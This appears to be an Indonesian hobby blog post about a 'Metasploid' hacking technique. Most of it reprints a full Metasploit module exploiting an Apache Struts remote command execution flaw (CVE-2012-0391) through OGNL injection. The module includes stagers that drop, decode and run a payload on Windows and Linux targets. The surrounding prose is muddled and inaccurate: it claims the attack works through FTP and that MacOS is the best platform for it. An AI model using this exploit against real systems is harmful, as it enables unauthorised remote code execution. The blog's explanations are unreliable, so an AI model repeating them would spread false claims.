Hacking Teknik Metasploid Oleh Hacker-Hacker Veteran Injeksi Remote Access Computer Command


Hacking Teknik Metasploid Oleh Hacker-Hacker Veteran Injeksi Remote Access Computer Command


 

Salam blogger Indonesia…
Kami tidak berbagi cara untuk melakukan hacking ini,
Namun kami akan berbagi alur dari proses hacking tersebut.

Yeaa… kebanyakan hacker selalu melakukan aksinya jika terlihat celah-celah yang memungkinkan mereka dapat menerobos keamanan dari setiap system yang mereka targetkan.
Begitu pulsa dengan cara Metasploid.

Teknik ini memanfaatkan sebuah koneksi FTP (File Tranfer Protocol) yang memungkinkan hacker untuk dapat mencuri file taget melalui protocol yang mereka jebol, dalam proses ini CMD (Command) sangat diberlakukan dan melakukannya melewati lajur HTTP Client.

Mungkin para hacker yang menggunakan cara ini banyak yang memakai OS (Operation System) Linux, adapun beberapa hacker kawakan yang menggunakan Windows, tapi dalam proses ini pendukung yang sangat kuat dari OS sebenarnya adalah MacOS, karena dalam MacOS FTP yang tampil lebih banyak dari setiap fitur-fitur hacking tersebut memungkinkan para hacker dapat melihat lajur atau kondisi Koneksinya.

Cobalah perhatikan proses lajut Metasploid dibawah :

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
                Rank = ExcellentRanking

                include Msf::Exploit::CmdStagerTFTP
                include Msf::Exploit::Remote::HttpClient

                def initialize(info = {})
                                super(update_info(info,
                                                'Name'           => 'Apache Struts <= 2.2.1.1 Remote Command Execution',
                                                'Description'    => %q{
                                                                                This module exploits a remote command execution vulnerability in
                                                                Apache Struts versions < 2.2.1.1. This issue is caused because the
                                                                ExceptionDelegator interprets parameter values as OGNL expressions
                                                                during certain exception handling for mismatched data types of properties,
                                                                which allows remote attackers to execute arbitrary Java code via a
                                                                crafted parameter.
                                                },
                                                'Author'         =>
                                                                [
                                                                                'Johannes Dahse', # Vulnerability discovery and PoC
                                                                                'Andreas Nusser', # Vulnerability discovery and PoC
                                                                                'juan vazquez', # Metasploit module
                                                                                'sinn3r' # Metasploit module
                                                                ],
                                                'License'        => MSF_LICENSE,
                                                'Version'        => '$Revision: $',
                                                'References'     =>
                                                                [
                                                                                [ 'CVE', '2012-0391'],
                                                                                [ 'OSVDB', '78277'],
                                                                                [ 'EDB', '18329'],
                                                                                [ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt']
                                                                ],
                                                'Platform'      => [ 'win', 'linux'],
                                                'Privileged'     => true,
                                                'Targets'        =>
                                                                [
                                                                                ['Windows Universal',
                                                                                                {
                                                                                                                                'Arch' => ARCH_X86,
                                                                                                                                'Platform' => 'win'
                                                                                                }
                                                                                ],
                                                                                ['Linux Universal',
                                                                                                {
                                                                                                                                'Arch' => ARCH_X86,
                                                                                                                                'Platform' => 'linux'
                                                                                                }
                                                                                ],
                                                                ],
                                                'DisclosureDate' => 'Jan 06 2012',
                                                'DefaultTarget' => 0))

                                                register_options(
                                                                [
                                                                                Opt::RPORT(8080),
                                                                                OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),
                                                                                OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
                                                                ], self.class)
                end

                def execute_command(cmd, opts = {})

                                uri = String.new(datastore['TARGETURI'])
                                uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\"))%2b'") if target['Platform'] == 'win'
                                uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\".split(\"@\")))%2b'") if target['Platform'] == 'linux'
                                uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))

                                vprint_status("Attempting to execute: #{cmd}")

                                resp = send_request_raw({
                                                'uri'     => uri,
                                                'version' => '1.1',
                                                'method'  => 'GET',
                                }, 5)

                end

                def windows_stager
                                exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"

                                print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
                                execute_cmdstager({ :temp => '.'})
                                @payload_exe = payload_exe

                                print_status("Attempting to execute the payload...")
                                execute_command(@payload_exe)
                end

                def linux_stager
                                cmds = "/bin/sh@-c@echo LINE | tee FILE"
                                exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
                                base64 = Rex::Text.encode_base64(exe)
                                base64.gsub!(/\=/, "\\u003d")
                                file = rand_text_alphanumeric(4+rand(4))

                                execute_command("/bin/sh@-c@touch /tmp/#{file}.b64")
                                cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
                                base64.each_line do |line|
                                                line.chomp!
                                                cmd = cmds
                                                cmd.gsub!(/LINE/, line)
                                                execute_command(cmds)
                                end

                                execute_command("/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
                                execute_command("/bin/sh@-c@chmod +x /tmp/#{file}")
                                execute_command("/bin/sh@-c@rm /tmp/#{file}.b64")

                                execute_command("/bin/sh@-c@/tmp/#{file}")
                                @payload_exe = "/tmp/" + file
                end

                def on_new_session(client)
                                if target['Platform'] == 'linux'
                                                print_status("Deleting #{@payload_exe} payload file")
                                                execute_command("/bin/sh@-c@rm #{@payload_exe}")
                                else
                                                print_status("Windows does not allow running executables to be deleted")
                                                print_status("Delete the #{@payload_exe} file manually after migrating")
                                end
                end

                def exploit
                                if not datastore['CMD'].empty?
                                                print_status("Executing user supplied command")
                                                execute_command(datastore['CMD'])
                                                return
                                end

                                case target['Platform']
                                                when 'linux'
                                                                linux_stager
                                                when 'win'
                                                                windows_stager
                                                else
                                                                raise RuntimeError, 'Unsupported target platform!'
                                end

                                handler
                end
end

Dari Scipt diatas menunjukkan bahwa semua lajut hacking melalui CMD, dan itu semua tergantung pada seorang hacker yang melakukan Teknik Metasploid tersebut.
Sehingga target dan tujuan dari pengambilan data atau file dapat dengan mudah di Remote atau decontrol oleh hacker tersebut.

Hanya itu penjelasan tentang teknik Metasploid dari kami.
Semoga bermanfaat, dan dapat menambah pengetahuan sobat…

Salam Rafi Orilya Groups…

Baca juga artikel dibawah :


Artikel Dilindungi
Sertakan alamat blog ini jika mengcopy paste
(Hak Cipta Dilindungi)


Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin
Previous
Next Post »